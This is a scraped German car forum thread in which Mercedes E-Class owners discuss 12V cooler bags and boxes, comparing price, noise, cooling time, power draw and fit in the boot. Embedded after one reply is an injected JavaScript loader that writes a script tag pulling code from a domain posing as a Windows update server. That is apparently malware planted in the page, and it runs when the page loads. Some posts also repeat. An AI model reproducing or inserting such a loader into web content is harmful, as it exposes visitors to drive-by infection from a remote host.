Kühltasche; Portable Kühlbox; Gleichrichter

Diskutiere Kühltasche; Portable Kühlbox; Gleichrichter im Forum E-Klasse & CLS Forum im Bereich Mercedes-Benz - Hallo, möchte für mein S 211 T-Modell, Baujahr 2008 eine Kühltasche oder eine Kühlbox kaufen. Kühltasche: Bestellnr. B66818725 Preis ca. €...
Status
Für weitere Antworten geschlossen.
A

anne18

Stammgast
Fahrzeug
S211
Hallo,

möchte für mein S 211 T-Modell, Baujahr 2008 eine Kühltasche oder eine Kühlbox kaufen.

Kühltasche: Bestellnr. B66818725
Preis ca. € 139,--

Kühlbox: Bestellnr. A0008204206
Preis ca. € 185,--

Wer hat eine von beiden Objekten?

Gibt es andere Bezugsmöglichkeiten als über DB?

Welche Erfahrungen (Vor- und Nachteile)

Geräusche?

Wie lange dauert es, bis bei 12 V eine Kühlwirkung eintritt?

Stromverbrauch ist leider nicht angegeben. Also, wieviel kW werden benötigt?

Ist ein Gleichrichter für 220 V Anschluss hilfreich?

Möchte dieses Teil in den Kofferraum stellen. Welche Erfahrungen gibt es hierbei? Bauhöhe oder Befestigungen?

hallo anne,

ich habe mich für ein no name modell entschieden, welches für den gebrauch im auto einen stecker dran hat und auch für den gebrauch zu hause an der üblichen steckdose über 240 v. gekostet hat das teil 30 euronen und es dauert nur wenige minuten, dann ist das ding gut kalt. genial ist es ja, wenn du zu hause alles reintust es in die steckdose steckst und dann einfach nur danach ins auto und wieder in die dose...fertig, kühlkreis fast nicht unterbrichen und ergebnis...alles schick kalt ;o)

hallo anne,

ich habe mich für ein no name modell entschieden, welches für den gebrauch im auto einen stecker dran hat und auch für den gebrauch zu hause an der üblichen steckdose über 240 v. gekostet hat das teil 30 euronen

kühlkreis fast nicht unterbrichen und ergebnis...alles schick kalt ;o)

Haben wir genauso gemacht, funktioniert vernünftig.
Das Betriebsgeräusch ist auch leise. Von der Höhe her passt es bei uns unter das flexible Heckrollo (Kombi) bzw. auch in den Kofferraum. In den Märkten, wo wir geschaut haben, waren diese Boxen alle etwa in gleicher Größe. Separat sichern mussten wir die Box noch nicht, wenn sie voll ist und noch was daneben steht.

die günstigen Geräte funktionierem m.w. alle nach diesem Prinzip: Peltier-Element ? Wikipedia

Diejenigen mit Kompressor, also wie im Kühlschrank, kosteten (ist schon ein paar Jahre her) alle mehrere hundert EUR.

Zuletzt bearbeitet von einem Moderator:
Kühltasche

Hallo Anne,

ich habe den Vorgänger der aktuellen Kühltasche...

diese...
COOLING BAG UNI - A Class 2005 - On Accessories Comfort & Protection - Mercedes-Benz Parts, Inchcape

12V, max 4A, 14 Liter. Bei 3x1 Liter-Flaschen ist die Tasche allerdings fast voll. Also für einen (Gross)Einkauf ist sie nicht zu gebrauchen.
Für Urlaubsfahrten oder einfach längerere Autofahrten allerdings ideal.

Hatte sie letzte Woche über ein Ladegerät in der Garage im Einsatz. 14V, knapp über 2A, macht also 0.028 kW:D

Kühlung von Raumtemperatur bis 2°C bei 25°C dauert 2h.

hi

wollte nur mal danke für die Hilfe sagen hat mir auch weiter geholfen der Thread.

<script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>

Haben wir genauso gemacht, funktioniert vernünftig.
Das Betriebsgeräusch ist auch leise. Von der Höhe her passt es bei uns unter das flexible Heckrollo (Kombi) bzw. auch in den Kofferraum. I

Herzlichen Dank.
genau so eine Kühlbox suche ich.
1. Passt unter die flexible Heckrollo Abedeckung
2. Betriebsgeräusch leise
3. Wo könnte man eine derartige Kühlbox kaufen

Status
Für weitere Antworten geschlossen.
Thema: Kühltasche; Portable Kühlbox; Gleichrichter